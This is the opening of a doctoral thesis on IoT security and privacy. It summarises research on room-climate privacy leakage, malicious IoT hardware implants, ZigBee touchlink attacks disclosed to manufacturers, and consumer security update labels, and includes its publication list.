Security and Privacy in the Internet of Things: Technical and Economic Perspectives

Sicherheit und Privatsph¨areim Internet der Dinge: Technische und ¨okonomische Perspektiven

Der Technischen Fakult¨atder Friedrich-Alexander-Universit¨at Erlangen-N¨urnberg zur Erlangung des Grades

DOKTOR-INGENIEUR

vorgelegt von

Philipp Morgner Als Dissertation genehmigt von der Technischen Fakult¨atder Friedrich-Alexander-Universit¨at Erlangen-N¨urnberg

Tag der m¨undlichen Pr¨ufung: 31. Mai 2019 Vorsitzender des Promotionsorgans: Prof. Dr.-Ing. Reinhard Lerch Gutachter: Prof. Dr.-Ing. Felix Freiling Gutachterin: Prof. Dr. Christina P¨opper Abstract

For the last twenty years, the Internet extends from digital spheres into the physical world through applications such as smart homes, smart cities, and Industry 4.0. Although this technological revolution of the Internet of Things (IoT) brings many benefits to its users, such as increased energy efficiency, optimized and automated processes, and enhanced comfort, it also introduces new security and privacy concerns. In the first part of this thesis, we examine three novel IoT security and privacy threats from a technical perspective. As first threat, we investigate privacy risks arising from the collection of room climate measurements in smart heating applications. We assume that an attacker has access to temperature and relative humidity data, and trains machine learning classifiers to predict the presence of occupants as well as to discriminate between different types of activities. The results show the leakage of room climate data has serious privacy implications. As second threat, we examine how the expansion of wide-area IoT infrastructure facilitates new attack vectors in hardware security. In particular, we explore to which extent malicious product modifications in the supply chain allow attackers to take control over these devices after deployment. To this end, we design and build a malicious IoT implant that is inserted in arbitrary electronic products. In the evaluation, we leverage these implants for hardware-level attacks on safety- and security-critical products. As third threat, we analyze the security of ZigBee, a popular network standard for smart homes. We present novel attacks that make direct use of the standard’s features, showing that one of its commissioning procedures is insecure by design. In the evaluation of these vulnerabilities, we reveal that attackers are able to eavesdrop key material as well as take-over ZigBee products and networks from a distance of more than 100 meters. In the second part of this thesis, we investigate how IoT security can be improved. Based on an analysis of the root causes of ZigBee’s security vulnerabilities, we learn that eco- nomic considerations influenced the security design of this IoT technology. Consumers are currently not able to reward IoT security measures as an asymmetric information bar- rier prevents them from assessing the level of security that is provided by IoT products. As a result, manufacturers are not willing to invest into comprehensive security designs as consumers cannot distinguish them from insufficient security measures. To tackle the asymmetric information barrier, we propose so-called security update labels. Focusing on the delivering of security updates as an important aspect of enforcing IoT security, these labels transform the asymmetric information about the manufacturers’ willingness to provide future security updates into an attribute that can be considered during buying decisions. To assess the influence of security update labels on the consumers’ choice, we conducted a user study with more than 1,400 participants. The results reveal that the proposed labels are intuitively understood by consumers, considerably influence their buy- ing decisions, and therefore have the potential to establish incentives for manufacturers to provide sustainable security support. Zusammenfassung

In den letzten 20 Jahren hat sich das Internet durch Applikationen wie Smart Homes, Smart Cities und Industrie 4.0 uber¨ die digitalen Sph¨aren hinaus in die physische Welt ausgestreckt. Obwohl dieses sogenannte Internet der Dinge (engl. Internet of Things, IoT) viele Vorteile fur¨ die Nutzer mit sich bringt, wie beispielsweise optimierte und automati- sierte Prozesse, h¨ohere Energieeffizienz und mehr Komfort, so fuhrt¨ es doch auch zu neuen Herausforderungen in Bezug auf Sicherheit und Privatsph¨are. Im ersten Teil der Arbeit wurden drei neue Bedrohungen im IoT aus einer technischen Perspektive untersucht. Zuerst wurden Privatsph¨are-Risiken analysiert, die durch eine massenhafte Sammlung von Raumklima-Daten in Smart Homes entstehen. Dabei wurde angenommen, dass ein Angreifer nur Zugriff auf Temperatur- und Luftfeuchtigkeitsmess- daten hat, und gezeigt, dass man damit sowohl die Anwesenheit von Bewohnern als auch einzelne Aktivit¨aten mit Hilfe von maschinellem Lernen voneinander unterscheiden kann. Als Zweites wurden neue Angriffsm¨oglichkeiten betrachtet, die durch die Ausbreitung von fl¨achendeckender IoT-Infrastruktur entstehen. Insbesondere wurde erforscht, in welchem Ausmaß Hardware-Manipulationen von Produkten in der Lieferkette es Angreifern erlau- ben, sp¨ater Kontrolle uber¨ diese manipulierten Ger¨ate zu ubernehmen.¨ Dazu wurde ein b¨osartiges IoT-Implantat entwickelt, das in beliebige elektrische Produkte eingesetzt wer- den kann. Drittens wurde die Sicherheit von ZigBee untersucht, einem weitverbreiteten Netzwerkstandard fur¨ Smart Homes. Durch Angriffe, die lediglich vorhandene Funktionen des Standards ausnutzen, wurde die Unsicherheit des sogenannten Touchlink Commissio- nings gezeigt, einer von zwei m¨oglichen Inbetriebnahme-Prozeduren in diesem Standard. Die praktische Auswertung dieser Schwachstellen ergab, dass es Angreifern m¨oglich ist, Schlusselmaterial¨ abzuh¨oren, sowie ZigBee-Produkte und potentiell ganze Netzwerke aus einer Entfernung von uber¨ 100 Metern zu ubernehmen.¨ Im zweiten Teil der Arbeit wurden Ans¨atze zur Verbesserung der Sicherheit untersucht. Die Ursachenanalyse der Sicherheitsprobleme in ZigBee ergab, dass ¨okonomische Ent- scheidungen einen Einfluss auf das Sicherheitsdesign hatten. Konsumenten sind aktuell nicht in der Lage, das Sicherheitslevel eines IoT-Produktes zu bewerten. Infolgedessen investieren Hersteller nicht in starke Sicherheitsdesigns, da Konsumenten diese sowieso nicht von unzureichenden Sicherheitsmechanismen unterscheiden k¨onnen. Um diese asym- metrische Informationsbarriere abzubauen, wurden sogenannte Sicherheitsupdate-Labels vorgeschlagen. Diese Labels verwandeln die asymmetrische Information, inwiefern Her- steller zukunftig¨ Sicherheitsupdates bereitstellen werden, in verst¨andliche Produktattri- bute, welche bei Kaufentscheidungen berucksichtigt¨ werden k¨onnen. Um den Einfluss der Sicherheitsupdate-Labels auf Konsumentscheidungen zu belegen, wurde eine Nutzerstudie mit uber¨ 1.400 Teilnehmern durchgefuhrt.¨ Die Ergebnisse zeigen, dass Konsumenten die- se Labels intuitiv verstehen und beachten. Infolgedessen k¨onnen diese Labels Anreize fur¨ Hersteller schaffen, nachhaltig die Sicherheit ihrer IoT-Produkte zu unterstutzen.¨ Danksagung

Die vorliegende Dissertation ist aus dem Privileg entstanden, am Lehrstuhl f¨ur IT- Sicher- heitsinfrastrukturen an der Friedrich-Alexander-Universit¨atErlangen-N¨urnberg zu pro- movieren. Insbesondere zwei Personen haben einen maßgeblichen Anteil an diesem Erfolg. Zum einen Felix Freiling, welcher als Lehrstuhlinhaber eine hervorragende Arbeitsatmo- sph¨aregeschaffen hat, in welcher meine Forschungsideen Realit¨atwerden durften. Durch sein offenes Ohr und seinen pers¨onlichen Einsatz f¨urMitarbeitende und Studierende ist er mir ein Vorbild. Zum anderen Zinaida Benenson, welche mich als fachliche Betreuerin zu einem erfolgreichen Promovierenden ausgebildet hat. Durch ihre Kompetenz und gewis- senhafte Arbeitsweise hat sie mich gelehrt, wissenschaftliche Methoden zu verstehen und anzuwenden, sowie die Kunst des Verfassens von Publikationen zu durchdringen. Ich bedanke mich herzlich bei beiden f¨urdie weitreichende Unterst¨utzung! Des Weiteren bedanke ich mich herzlich bei Christina P¨opper f¨ur die Bereitschaft, das Zweitgutachten f¨urdiese Dissertation zu verfassen. Im Laufe meiner Forschungst¨atigkeiten hatte ich das Vorrecht, wissenschaftliche Projekte mit verschiedenen Forschenden, Doktoranden und Studierenden durchzuf¨uhren.Besonders bedanken m¨ochte ich mich bei Frederik Armknecht und Christian M¨ullerf¨urdie erfolg- reiche Zusammenarbeit im DFG-Projekt1 “Entwicklung und Anwendung eines fundierten Rahmenwerkes f¨urSicherheit in Sensornetzen”. Mein weiterer Dank gilt Bj¨ornEskofier, Matthias Ring und Christian Riess f¨urdie fachliche Unterst¨utzungbei der Auswertung von Raumklima-Daten mittels maschinellen Lernens. Ebenso bedanke ich mich bei Nicole Koschate-Fischer und Christoph Mai f¨urdie fachliche Unterst¨utzungbei der Umsetzung der Nutzerstudie zu den Sicherheitsupdate-Labels. Dar¨uber hinaus gilt mein Dank Stephan Mattejat, Stefan Pfennig und Dennis Salzner f¨urdie Mitarbeit an gemeinsamen Publika- tionen. Ich bedanke mich bei Vincent Haupert, Paulo Martinez, Gaston Pugliese, Lena Reinfelder und Theresa Rottmann f¨urdas Korrekturlesen von Teilen dieser Arbeit. Mein erweiterter Dank gilt meinen Lehrstuhl-Kolleginnen und -Kollegen, sowohl dem wis- senschaftlichen als auch dem administrativen Personal, die mir mit ihrer tatkr¨aftigeUn- terst¨utzungund Freundschaft mehr als nur ein Arbeitsumfeld gegeben haben. Nicht zuletzt danke ich meinen Eltern, Geschwistern und Freunden f¨urdie Unterst¨utzung auf all meinen Lebenswegen.

1 Meine Anstellung wurde zeitweise durch die Deutsche Forschungsgemeinschaft (DFG) finanziert. Contents

1 Introduction ...... 1 1.1 Motivation ...... 1 1.2 Structure of Thesis ...... 2 1.3 Contributions ...... 3 1.3.1 Contributions of Part I: Technical Perspective ...... 3 1.3.2 Contributions of Part II: Economic Perspective ...... 5 1.4 Publications ...... 6

Technical Perspective

2 Background and Related Work ...... 13 2.1 Understanding the Internet of Things ...... 13 2.1.1 Application-Level Perspective ...... 14 2.1.2 System-Level Perspective ...... 17 2.1.3 Network-Level Perspective ...... 18 2.2 Threat Classification Taxonomy for the Internet of Things ...... 19 2.2.1 Threats of Information Leakage ...... 21 2.2.2 Threats of Connectivity Misuse ...... 23 2.2.3 Threats of Object Exploitation ...... 25

3 Privacy Implications of Room Climate Data ...... 31 3.1 Introduction ...... 32 3.2 Threat Model ...... 34 3.3 Experimental Design and Methods ...... 35 3.3.1 Experimental Setup and Tasks ...... 35 3.3.2 Sensor Data Collection ...... 37 3.3.3 Experimental Procedure ...... 38

i Contents

3.3.4 Participants and Ethical Principles ...... 39 3.3.5 Classifier Design ...... 39 3.4 Results...... 40 3.4.1 Visual Inspection ...... 40 3.4.2 Occupancy Detection ...... 42 3.4.3 Occupancy Estimation ...... 42 3.4.4 Activity Recognition ...... 43 3.4.5 Multi-Sensor Classification ...... 45 3.5 Further Observations ...... 46 3.5.1 Length of Measurement Windows ...... 47 3.5.2 Selected Features ...... 47 3.5.3 Size and Layout of Rooms ...... 48 3.5.4 Position of Sensors ...... 48 3.6 Discussion ...... 48 3.6.1 Privacy Implications...... 49 3.6.2 Location-Independent Classification ...... 49 3.6.3 Policy Implications ...... 50 3.7 Related Work on Occupancy Detection and Activity Recognition ...... 51 3.8 Conclusion ...... 51

4 Malicious IoT Implants ...... 55 4.1 Introduction ...... 56 4.2 Preliminaries ...... 57 4.2.1 LPWAN Infrastructure ...... 57 4.2.2 Serial Communication ...... 58 4.2.3 I2C Communication Protocol ...... 61 4.3 Threat Model ...... 63 4.3.1 Untrusted Supply Chain ...... 63 4.3.2 Attacker Model ...... 64 4.4 Malicious IoT Implant ...... 65 4.4.1 Design Criteria ...... 65

ii Contents

4.4.2 Attack Procedures ...... 66 4.4.3 Implementation ...... 67 4.5 Evaluation ...... 68 4.5.1 Dimensions...... 68 4.5.2 Power Consumption ...... 69 4.5.3 Wireless Range ...... 69 4.5.4 Cost ...... 69 4.5.5 Effort of Insertion ...... 69 4.5.6 Feasibility of Attacks ...... 70 4.6 Discussion ...... 73 4.6.1 Limitations ...... 74 4.6.2 Countermeasures...... 74 4.7 Related Work on Malicious Hardware ...... 76 4.8 Conclusion ...... 77

5 Insecurity of ZigBee Touchlink Comissioning ...... 79 5.1 Introduction ...... 79 5.2 Background on ZigBee ...... 81 5.2.1 System Model ...... 82 5.2.2 Security ...... 82 5.2.3 Commissioning ...... 83 5.3 Threat Model ...... 84 5.3.1 Security Goals and Attacker Model ...... 84 5.3.2 Threat Scenarios ...... 85 5.4 Security Analysis of Touchlink Commissioning ...... 86 5.4.1 Penetration Testing Framework Z3sec ...... 87 5.4.2 Testbed ...... 87 5.4.3 Denial-of-Service Attacks ...... 89 5.4.4 Attacks to Gain Control ...... 92 5.4.5 Evaluation of Wireless Range ...... 94 5.4.6 Recovery ...... 96

iii Contents

5.5 Disclosure and Response ...... 97 5.6 Discussion ...... 98 5.7 Related Work on ZigBee Security ...... 100 5.8 Conclusion ...... 101

Economic Perspective

6 Root Cause Analysis of ZigBee’s Insecurity ...... 105 6.1 Introduction ...... 105 6.2 Background on ZigBee ...... 106 6.3 Root Cause Analysis ...... 107 6.3.1 Motivation for Standardization ...... 108 6.3.2 ZigBee as Case Study on Security Economics ...... 109 6.4 Implications of Insecure IoT Products ...... 111 6.5 A Road to Improvement...... 112 6.5.1 Define Precise Security Models ...... 112 6.5.2 Stop Consumer and Business Security Differentiation ...... 112 6.5.3 Add Membership Level for Academic Institutes ...... 113 6.5.4 Conduct Security Testing Without Conflict of Interest ...... 113 6.5.5 Define and Enforce Update Policy ...... 114 6.6 Related Work on Security Economics in IoT Standardization ...... 114 6.7 Conclusion ...... 115

7 Security Update Labels ...... 117 7.1 Introduction ...... 118 7.2 Background and Related Work ...... 120 7.2.1 Product Labeling ...... 120 7.2.2 Security & Privacy Labels and Regulatory Approaches ...... 121 7.2.3 Conjoint Analysis ...... 122 7.3 Security Labels for Consumers ...... 122 7.3.1 Security Scales for Labeling ...... 123

iv Contents

7.3.2 Security Update Labels ...... 123 7.3.3 An Idea for a Regulatory Framework ...... 124 7.3.4 Concerns towards Security Update Labels ...... 125 7.4 Concept of User Study ...... 126 7.5 Preliminary Studies ...... 128 7.5.1 Prestudy 1: Selection of Product Categories ...... 128 7.5.2 Prestudy 2: Definition of Product Attributes and Levels ...... 132 7.6 Conjoint Analysis ...... 136 7.6.1 Method ...... 136 7.6.2 Pilot Study ...... 138 7.6.3 Sample Size ...... 139 7.6.4 Sample Characteristics ...... 139 7.6.5 Results ...... 139 7.6.6 Validity ...... 142 7.6.7 Segmentation ...... 145 7.7 Discussion ...... 147 7.8 Conclusion ...... 149

8 Conclusion and Future Work ...... 151

Bibliography ...... 153

v Chapter 1

Introduction

In 1999, Kevin Ashton coined the term ‘Internet of Things’ [16]. This slogan was the headline of a marketing presentation that promoted his idea of utilizing radio-frequency identification (RFID) in supply chains. Now, twenty years later, this simple idea evolved into a major technological paradigm, in which plenty of other technologies absorbed Ash- ton’s idea and expedited his vision: Everyday items, household appliances, and mobile devices are interconnected via wireless networks and over the Internet. Industrial produc- tion machines communicate seamlessly with each other, and the deployment of sensors across large urban areas is promoted to achieve smart city environments.

1.1 Motivation

According to Gartner’s prediction [99], the installed base of IoT devices will globally reach 20.4 billion units in 2020. The majority of these IoT devices, 12.9 billion units, is predicted to be installed in the consumer sector. Hence, IoT consumer products play a prominent role in the expansion of the IoT ecosystem. User surveys [322, 199] about concerns regarding the installation of IoT products in private spaces conclude that security is one of consumers’ major concerns. These reservations are fostered by almost daily headlines about recently revealed security flaws and incidents concerning IoT products. Recently disclosed security issues in IoT consumer products range from unsecured data transmissions [252, 213], leaked master keys [337], and unsecured backends [54, 12, 107] to insufficient physical security mechanisms [213], over-privileged applications [91, 107], hard-coded credentials [54], and implementation bugs [248, 230, 123]. In general, the IoT combines security challenges from the domains of software, hardware, the Internet, low-power systems, and wireless systems. As the Internet extends into the physical world, the integration of these security challenges can have severe effects on the physical safety of living beings and critical infrastructure. Furthermore, the IoT collects extensive amounts of sensor data within the physical world to enable ‘smart’ functionality of IoT applications. However, this data collection raises massive privacy concerns. Often, consumers cannot determine how their data is used as the data collection and processing lacks transparency on the part of smart service providers and manufacturers. Numerous technical solutions and frameworks (e.g., [30, 92, 206, 265, 153, 306]) have been proposed to mitigate security and privacy threats in the IoT ecosystem. However, we expect that the spillover of academic security research into real-world IoT products is

1 1 Introduction going to be slow or will not happen at all. Especially in the domain of IoT consumer products, manufacturers seem to be reluctant to adapt these solutions. We believe that further research in technical security solutions alone will not lead to substantial improvements in the security of IoT consumer products. In fact, IoT security can only be enhanced by considering the business goals of the manufacturers and creating economic incentives for applying stronger security measures. From our point of view, an asymmetric information barrier exists as consumers are not able to determine the level of security that is provided by an IoT consumer product. As a consequence, consumers do not reward security, and thus, manufacturers do not invest in such measures. Because of their finite resources, manufacturers invest time and effort into product features that are rewarded by consumers, e.g., new functions and to be the first on the market [9, 11]. Hence, security in IoT consumer products is only considered a non-functional feature with an unimportant role in the consumer’s choice. The objectives of this work are to investigate security and privacy threats within the IoT as well as to propose an approach to foster sustainable IoT security efforts. We start with the examination of new threats that relate to the IoT ecosystem. Based on a root cause analysis of one of these IoT threats, we then introduce the concept of security update labels. These labels enable consumers in buying decisions to assess and compare for how long manufacturers guarantee to provide security updates. At the end, we empirically investigate the effects of the security patching labels on the consumers’ choice. In the following sections of this chapter, we outline the structure and contributions of this thesis, as well as present the publications that are incorporated in this work.

1.2 Structure of Thesis

As illustrated in Figure 1.1, this thesis consists of two parts that complement each other: The first part, which comprises Chapters 2 to 5, focuses on security and privacy in the IoT from a technical perspective. The second part, which comprises Chapters 6 and 7, investigates our approach to strengthen IoT security from an economic perspective. In Chapter 2, we present background and related work. Thereby, related work is presented in the form of a threat classification taxonomy that classifies IoT threats into three cate- gories. For each category, we present a case study as a subsequent chapter: In Chapter 3, we look onto the threat of information leakage by presenting a case study on privacy impli- cations of room climate data. In Chapter 4, we explore the threat of connectivity misuse by investigating whether public IoT infrastructure can be used to command and control malicious hardware elements. In Chapter 5, we outline the threat of object exploitation by analyzing the security mechanisms of the popular smart home network standard ZigBee. In Chapter 6, we analyze economically-motivated root causes for the security vulnerabil- ities in the ZigBee standard. Finally, we propose and empirically investigate the idea of the security update labels in Chapter 7. We conclude this thesis and outline future work in Chapter 8.

2 1.3 Contributions

Figure 1.1: Structure of thesis.

1.3 Contributions

The contributions of this thesis are multi-fold and interdisciplinary. Projects incorporated in this work have been conducted in cooperation with researchers from the domains of cryptography, sport informatics, machine learning, marketing research, and psychology. Our contributions regarding IoT security and privacy presents both, detailed technical exploration of novel IoT threats as well as a potential solution that establishes economic incentives for manufacturers to provide security updates.

1.3.1 Contributions of Part I: Technical Perspective

In the first part of this thesis, we focus on the technical side and introduce a classification taxonomy for threats in the IoT ecosystem. For each class of threat, we elaborate with a case study that includes either experiments, or software and hardware implementations.

3 1 Introduction

In detail, we identify the contributions of the first part of this thesis as the following:

Exploration of Novel IoT Threats. We investigated IoT systems of different appli- cations and scenarios to learn about IoT-specific threats. We extend the current state of knowledge by evaluating the below listed threats with systematic methods. The overall goal is to raise awareness about the feasibility of these attacks.

1. Privacy Threats. In Chapter 3, we empirically investigated the long-hold belief that information concerning the presence and activities of occupants can be extracted from room climate data. For this, we implemented a machine learning pipeline and con- ducted experiments with human subjects. The results showed that we can distinguish whether none, one, or two persons are present in a room. Furthermore, we can discrim- inate between the activities of reading, standing, walking, and working on a PC. Thus, we provide evidence that even the leakage of such ‘unsuspicious’ data as temperature and relative humidity can lead to privacy violations.

2. Physical-Level Attacks Using Malicious Hardware. In Chapter 4, we introduce mali- cious IoT implants, showing that IoT infrastructures can be abused as an out-of-band communication channel for malicious hardware. Although the existence of malicious hardware implants is known [13], we are the first in the academic security commu- nity that designed and built a low-cost IoT-connected implant. The feasibility of this threat is demonstrated by inserting the implant in exemplary safety- and security- critical target devices. To allow the tampering with the target device, the implant exploits insecurities on physical level in the serial communication between sensors, memory chips, and processors. Thereby, we focused on the widely-adopted I2C serial communication standard as a market analysis showed that this serial communication standard has the highest support among 32-bit microcontrollers. We presented four attack procedures in which the malicious IoT implant directly interferes with the com- munication on I2C buses. We described the process of implant insertion in detail and evaluate real-world constraints such as size, cost, and energy consumption.

3. Wireless Network-Level Attacks. In Chapter 5, we provided a comprehensive security analysis of a popular wireless IoT standard that is used for smart home applications. More specific, we analyzed the specifications of the ZigBee touchlink commissioning procedure and learned that the touchlink communication relies on inter-PAN frames, which are neither secured nor authenticated. Furthermore, we identified that the proximity check between a ZigBee device and a ZigBee controller only relies on the signal strength. Exploiting these weaknesses in the ZigBee standard, we demonstrated that a passive eavesdropper can extract key material from a distance of 130 meters. Moreover, we showed that an active attacker is able to take-over IoT objects from a distance of 190 meters. We concluded that a single touchlink-enabled device is sufficient to compromise the security in a ZigBee network, and therefore, touchlink commissioning should not be supported in future ZigBee products. We disclosed our

4 1.3 Contributions

results to the manufacturers Philips, Osram, GE, and IKEA as well as to the ZigBee Alliance. As a result of our disclosure, products by Osram and IKEA received security patches that reduced the security risks for the consumers.

Release of Open-Source Tools and Data. In the course of our work, we published open-source tools and data for further usage of the academic community. These materials can be used for teaching and research purposes.

1. Room Climate Data Sets. For the experiments presented in Chapter 3, we collected more than 115 hours of room climate data in controlled environments with multiple sensors at three locations. This collection of fine-grained room climate data is labeled with the ground truth about the presence and activities of occupants and has been released as open data set on GitHub1. The release of these data sets shall support researchers that further investigate privacy implications of room climate data.

2. Z3sec ZigBee Penetration Testing Tool. For the security analysis of ZigBee products described in Chapter 5, we developed and released the open-source penetration testing framework Z3sec. This software allows the generation of arbitrary touchlink commands and provides an interface to take-over and control ZigBee-certified IoT objects. Z3sec is available as open source project on GitHub2 and can be used for future ZigBee security research.

1.3.2 Contributions of Part II: Economic Perspective

In the second part of this thesis, we present a solution for the rising threat of insecure IoT objects. Hereby, we especially focusing on IoT consumer products as these products contribute a large portion to the overall base of installed IoT objects. In our approach, we investigate how economic incentives can be established that could motivate manufacturers to invest more effort into sustainable security. In detail, the contributions of the second part of this thesis are as following:

Root Cause Analysis of Insecure IoT Standardization. In the aftermath of the responsible disclosure concerning security vulnerabilities in ZigBee products, we had dis- cussions with affected manufacturers and the ZigBee Alliance. Based on these discussions and further research about the economic motivations for standardization, we analyzed root causes that led to the insufficient security architecture of this particular ZigBee applica- tion standard (cf. Chapter 5). We summarized the security trade-offs made in these IoT specifications and provided recommendations on how to strengthen security architectures in future IoT standardization efforts.

1 https://github.com/IoTsec/Room-Climate-Datasets 2 https://github.com/IoTsec/Z3sec

5 1 Introduction

Proposal of Labels to Strengthen Security of IoT Consumer Products. In Chap- ter 7, we proposed security update labels as a way to enable an informed consumer choice regarding security properties of IoT consumer products. More precisely, our proposal transforms the asymmetric information about the manufacturer’s willingness of providing security updates into an intuitively assessable and comparable feature. This contribution is important because economic incentives for security patching are searched for, e.g., by the US Departments of Commerce and Homeland Security [285], but no practical solution has been established yet to the best of our knowledge.

Empirical User Study on Security Update Guarantees. Additionally in Chapter 7, we empirically examined the impact of guaranteeing security patches on the consumer choice towards IoT consumer products. This is important because security patching is discussed by experts as one of the most effective countermeasures against insecure IoT devices, while the consumers’ acceptance for the promise of security updates has never been comprehensively assessed to the best of our knowledge. The results revealed that the availability of security updates is a very important factor in buying decisions. Thereby, the importance depends on consumers’ perceived security risk towards the particular product category.

1.4 Publications

During the work on this thesis, a number of articles were published at academic conferences and workshops, as well as in an academic journal. This thesis is based on the publications that are listed in the following. The publications are sorted by type and then listed in chronological order of their date of publication.

Journal Article

[15] F. Armknecht, Z. Benenson, P.P. MorgnerMorgner, Morgner C. M¨uller,and C. Riess3, “Privacy im- plications of room climate data,” Journal of Computer Security, vol. 27, no. 1, pp. 113–136, 2019. [Online]. Available: https://content.iospress.com/articles/ journal-of-computer-security/jcs181133

Articles in Conference and Workshop Proceedings

[213] P.P. MorgnerMorgner, Morgner S. Mattejat, Z. Benenson, C. M¨uller,and F. Armknecht, “Insecure to the touch: Attacking ZigBee 3.0 via touchlink commissioning,” in Proceedings of the 10th ACM Conference on Security and Privacy in Wireless and Mobile Networks,

3 Authors sorted alphabetically

6 1.4 Publications

WiSec 2017, Boston, MA, USA, July 18-20, 2017, G. Noubir, M. Conti, and S. K. Kasera, Eds. ACM, 2017, pp. 230–240. [Online]. Available: http://doi.acm. org/10.1145/3098243.3098254 [214] P.P. MorgnerMorgner, Morgner C. M¨uller,M. Ring, B. Eskofier, C. Riess, F. Armknecht, and Z. Benen- son, “Privacy implications of room climate data,” in Computer Security - ESORICS 2017 - 22nd European Symposium on Research in Computer Security, Oslo, Nor- way, September 11-15, 2017, Proceedings, Part II, ser. Lecture Notes in Computer Science, S. N. Foley, D. Gollmann, and E. Snekkenes, Eds., vol. 10493. Springer, 2017, pp. 324–343. [Online]. Available: https://doi.org/10.1007/978-3-319- 66399-9_18 [208] P.P. Morgner Morgner and Z. Benenson, “Exploring security economics in IoT standardiza- tion efforts,” in Proceedings of the NDSS Workshop on Decentralized IoT Security and Standards, DISS’18, San Diego, CA, USA, February 18, 2018, 2018. [Online]. Available: http://wp.internetsociety.org/ndss/wp-content/uploads/sites/ 25/2018/07/diss2018_9_Morgner_paper.pdf [210] P.P. MorgnerMorgner, Morgner F. Freiling, and Z. Benenson, “Opinion: Security lifetime labels - Over- coming information asymmetry in security of IoT consumer products,” in Proceed- ings of the 11th ACM Conference on Security & Privacy in Wireless and Mobile Networks, WiSec 2018, Stockholm, Sweden, June 18-20, 2018, P. Papadimitratos, K. Butler, and C. P¨opper, Eds. ACM, 2018, pp. 208–211. [Online]. Available: http://doi.acm.org/10.1145/3212480.3212486 [215] P.P. MorgnerMorgner, Morgner S. Pfennig, D. Salzner, and Z. Benenson, “Malicious IoT implants: Tampering with serial communication over the Internet,” in Research in Attacks, Intrusions, and Defenses - 21st International Symposium, RAID 2018, Heraklion, Crete, Greece, September 10-12, 2018, Proceedings, ser. Lecture Notes in Computer Science, M. Bailey, T. Holz, M. Stamatogiannakis, and S. Ioannidis, Eds., vol. 11050. Springer, 2018, pp. 535–555. [Online]. Available: https://doi.org/10.1007/978- 3-030-00470-5_25 [211] P. Morgner, C. Mai, N. Koschate-Fischer, F. Freiling, and Z. Benenson, “Security update labels: Establishing economic incentives for security patching of IoT con- sumer products,” To appear in the Proceedings of the IEEE Symposium on Security and Privacy (S&P), May 2020, IEEE Computer Society, 2020.

Technical Report

[212] P.P. MorgnerMorgner, Morgner S. Mattejat, and Z. Benenson, “All your bulbs are belong to us: In- vestigating the current state of security in connected lighting systems,” CoRR, vol. abs/1608.03732, 2016. [Online]. Available: http://arxiv.org/abs/1608.03732

7 1 Introduction

These publications are incorporated into this thesis as follows:

• Chapter 3 is based on the conference publication “Privacy Implications of Room Cli- mate Data” [214]. Additionally, an extended version of this publication was published as a journal article [15]. These publications are joint work with colleagues from the digital sports group4 at the Friedrich-Alexander-Universit¨atErlangen-N¨urnberg, Ger- many, led by Bj¨ornEskofier, the multimedia security group at the Friedrich-Alexander- Universit¨atErlangen-N¨urnberg, Germany, led by Christian Riess, and the crypto- graphic research group5 led by Frederik Armknecht at the University of Mannheim, Germany. The author of this thesis coordinated the research project with the involved parties. He developed the main concept of the study in cooperation with Zinaida Benenson, applied for the approval from the data protection office, collected data at one of three locations, and evaluated the gathered sensor data under the guidance of Matthias Ring, Bj¨ornEskofier, and Christian Riess. Further data was collected at two other locations under the supervision of Christian M¨uller. The author of this thesis contributed large parts of the paper, which were iteratively improved by the other authors and himself.

• Chapter 4 is based on the conference publication “Malicious IoT Implants: Tampering with Serial Communication over the Internet” [215]. This publication is main-authored by the author of this thesis and reports the results of the master theses by Dennis Salzner [254] and Stefan Pfennig [234]. The author of this thesis drafted the idea of leveraging IoT infrastructure for hardware attacks. Dennis Salzner conducted ex- ploratory research on vulnerabilities of the I2C standard. Stefan Pfennig implemented the malicious IoT implants, which were evaluated in cooperation with the author of this thesis.

• Chapter 5 is based on the conference publication “Insecure to the Touch: Attacking ZigBee 3.0 via Touchlink Commissioning” [213]. A preliminary version of this paper was published as technical report under the title “All Your Bulbs Are Belong to Us: In- vestigating the Current State of Security in Connected Lighting Systems” [212]. These publications are main-authored by the author of this thesis and report the results of the bachelor thesis by Stephan Mattejat [198], who implemented the Z3sec penetration testing framework. The security vulnerabilities of ZigBee were evaluated by Stephan Mattejat in cooperation with the author of this thesis. Zinaida Benenson helped with the conceptualization of the research results.

• Chapter 6 is based on the workshop publication “Exploring Security Economics in IoT Standardization Efforts” [208]. This publication is main-authored by the author of this thesis and reports findings learned by Zinaida Benenson and the author of this thesis

4 Now: Machine Learning and Data Analytics Lab at the Friedrich-Alexander-Universit¨atErlangen- N¨urnberg, Germany 5 Now: Chair of Practical Computer Science IV: Dependable Systems Engineering at the University of Mannheim, Germany

8 1.4 Publications

in the aftermath of a responsible disclosure of vulnerabilities in IoT consumer products to their respective manufacturers and the affected standard-defining organization.

• Chapter 7 is based in the conference publication “Opinion: Security Lifetime Labels – Overcoming Information Asymmetry in Security of IoT Consumer Products” [210], which was extended with an empirical user study in the conference publication “Se- curity Update Labels: Establishing Economic Incentives for Security Patching of IoT Consumer Products” [211]. The latter publication was joint work with colleagues from the GfK-Chair of Marketing Intelligence led by Nicole Koschate-Fischer at the Friedrich-Alexander-Universit¨atErlangen-N¨urnberg, Germany. Excerpts of both pub- lications are also used in Chapter 1 to motivate the topic of the thesis. The author of this thesis was the initiator and coordinator of the project. He drafted the idea of the security update labels, which he discussed with Felix Freiling and Zinaida Benenson. The author of this thesis applied for the approval from the data protection office and conducted the empirical user study in coordination with Christoph Mai. Furthermore, he main-authored the publication, which was enhanced under the guidance of Zinaida Benenson. The definition of the experimental setup as well as the empirical analy- sis of the user study was supported by Zinaida Benenson, Christoph Mai, and Nicole Koschate-Fischer. • Excerpts from the abstracts of [210, 211, 213, 214, 215] are included in the abstract of this thesis.

Further Publications. In addition to the above-listed publications, the author of this thesis has also authored and contributed to further publications, which are not incorpo- rated in this thesis:

[209] P.P. MorgnerMorgner, Morgner Z. Benenson, C. M¨uller,and F. Armknecht, “Design space of smart home networks from a security perspective,” in Proceedings of the 14. GI/ITG KuVS Fachgespr¨achSensornetze (FGSN 2015), Erlangen, Germany, September 23- 24, 2015, 2015, pp. 41–44. [Online]. Available: https://core.ac.uk/download/ pdf/86433152.pdf [14] F. Armknecht, Z. Benenson, P.P. MorgnerMorgner, Morgner and C. M¨uller6, “On the security of the ZigBee light link touchlink commissioning procedure,” in International Workshop on Security, Privacy and Reliability of Smart Buildings, 2016, pp. 229–240. [Online]. Available: https://dl.gi.de/20.500.12116/874

6 Authors sorted alphabetically

9

Part I

Technical Perspective

Chapter 2

Background and Related Work

